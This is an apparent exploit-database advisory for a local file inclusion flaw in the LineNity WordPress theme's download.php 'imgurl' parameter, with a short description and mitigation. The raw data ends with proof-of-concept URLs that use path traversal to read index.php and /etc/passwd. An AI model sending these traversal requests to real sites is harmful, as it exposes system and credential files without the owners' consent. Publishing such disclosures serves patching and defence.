Local File Inclusion in WordPress Theme LineNity

vendor:

Linenity Clean Responsive WordPress Magazine

by:

Felipe Andrian Peixoto

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Linenity Clean Responsive WordPress Magazine

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 and Linux

2014

Local File Inclusion in WordPress Theme LineNity

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'imgurl' parameter of the 'download.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system. Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. It is also recommended to restrict access to the vulnerable script.

Source

Exploit-DB raw data:

[+] Local File Inclusion in WordPress Theme LineNity  
[+] Date: 13/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: download.php
[+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ] 
[+] PoC: http://localhost/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php
         http://localhost/wordpress/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd